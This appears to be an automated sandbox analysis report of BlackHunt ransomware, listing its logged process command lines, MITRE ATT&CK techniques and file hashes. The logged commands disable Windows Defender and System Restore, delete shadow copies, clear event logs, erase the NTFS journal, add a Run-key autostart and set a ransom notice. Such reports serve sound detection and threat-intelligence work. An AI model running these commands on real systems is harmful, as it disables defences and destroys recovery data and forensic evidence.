  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 7580)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 5008)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
- C:\Windows\system32\reg.exe (PID 1128)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  - C:\Windows\system32\reg.exe (PID 1876)
    Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    Signatures: Modifies registry class
- C:\Windows\system32\reg.exe (PID 4760)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
- C:\Windows\system32\reg.exe (PID 2976)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 3484)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
- C:\Windows\system32\reg.exe (PID 3232)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
  Signatures: Adds Run key to start application
- C:\Windows\system32\reg.exe (PID 3904)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  Signatures: Modifies registry class
- C:\Windows\system32\reg.exe (PID 2220)
  Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  Signatures: Modifies registry class
- C:\Windows\System32\Conhost.exe (PID 3484)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\system32\wevtutil.exe (PID 10232)
  Command line: wevtutil.exe cl Setup
  Signatures: Clears Windows event logs
- C:\Windows\system32\bcdedit.exe (PID 11664)
  Command line: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  Signatures: Modifies boot configuration data using bcdedit
- C:\Windows\system32\wevtutil.exe (PID 11272)
  Command line: wevtutil.exe cl Security /e:false
  Signatures: Clears Windows event logs
- C:\Windows\system32\bcdedit.exe (PID 6020)
  Command line: bcdedit /set {default} recoveryenabled No
  Signatures: Modifies boot configuration data using bcdedit
- C:\Windows\system32\vssadmin.exe (PID 10380)
  Command line: vssadmin.exe Delete Shadows /all /quiet
  Signatures: Interacts with shadow copies
- C:\Windows\system32\schtasks.exe (PID 12216)
  Command line: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
- C:\Windows\system32\notepad.exe (PID 1984)
  Command line: notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
- C:\Windows\SysWOW64\mshta.exe (PID 11964)
  Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - C:\Windows\SysWOW64\WerFault.exe (PID 232)
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 11964 -s 1456
    Signatures: Program crash
- C:\Windows\system32\reg.exe (PID 6452)
  Command line: REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
- C:\Windows\system32\schtasks.exe (PID 5728)
  Command line: SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
- C:\Windows\system32\reg.exe (PID 6364)
  Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
- C:\Windows\system32\taskkill.exe (PID 12436)
  Command line: taskkill /IM mshta.exe /f
  Signatures: Kills process with taskkill
- C:\Windows\system32\fsutil.exe (PID 10464)
  Command line: fsutil.exe usn deletejournal /D C:
  Signatures: Deletes NTFS Change Journal
- C:\Windows\SysWOW64\WerFault.exe (PID 8240)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 11964 -ip 11964
- C:\Windows\system32\wevtutil.exe (PID 9028)
  Command line: wevtutil.exe cl Application
  Signatures: Clears Windows event logs
- C:\Windows\system32\wevtutil.exe (PID 9880)
  Command line: wevtutil.exe cl System
  Signatures: Clears Windows event logs
- C:\Windows\system32\fsutil.exe (PID 468)
  Command line: fsutil usn deletejournal /D C:\
- C:\Windows\system32\fsutil.exe (PID 12424)
  Command line: fsutil usn deletejournal /D F:\
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (4)
Downloads
- Filesize: 1KB
  MD5: dec7b0511f56601ee5d63c9d3b5b92db
  SHA1: 5f8cd7a0df79ec9b15653b8a8961fdd6a1ff4611
  SHA256: 3d7b7bef51e8456a33b1304efdf31bb3a13f1d9dd82a8f56abb57146cb875742
  SHA512: 4296be7fea4f4cebac455a0513e85ce2ea5347d041c6c8379eda02938894a0f44c302834374b693219826a2ce17f765ee3bf0424a878b8d3e1a099ff26e1d341
- Filesize: 12KB
  MD5: 77bce56ca62bb362715d826ce5483f8d
  SHA1: 9df9e59c2d727679db4c000e27b5d9cb081d417d
  SHA256: 45aef0aaf25be6071cf6c0a79d2763c60ed4bcb71fdd98d7f615a3156eaec208
  SHA512: 60b71742cb03296df7927c943c45937521ee5838009aecfdc67bb05bc5ecc7252247c95dc0e0e0c44ddd3463a3f0b0b2be74b9fbe6d2decb184b34e441f0cc16
- Filesize: 1KB
  MD5: 9491c3d7dffa386fe7f4e8723d0e9ab6
  SHA1: 16c28f5af4cc795601940e241a68528b09f68c1a
  SHA256: 21cffd8e46a3205bf273e1974a6bc5ecf82efd6ce91f947435dfd20a707f5056
  SHA512: 46e842a6120674d0eafa6ea7ee3d809d6cafc6990ced800ba86b0fa0b7a12eb830b6628ef5b8ed8fb0dc5cd37ef77563251bfaf2b8e7432da3168ee6e9ad1f0f
- Filesize: 684B
  MD5: a44432bcea79f953023fbc52fb631d30
  SHA1: b745764899f6dc59bc34a30a33a5c9a6faf2be5b
  SHA256: abe6a0415916c45273a3efcfab118ddfbf2d14728284a9de76c683df4ffbfff0
  SHA512: a5db652671aaec4630be0509b2893f7b54aa7e622fc1a24a7a9ff0545e45b1c9e781bb01e2ab7a23a826720c35918f13282717b82635a9a08001d3877a0d8d81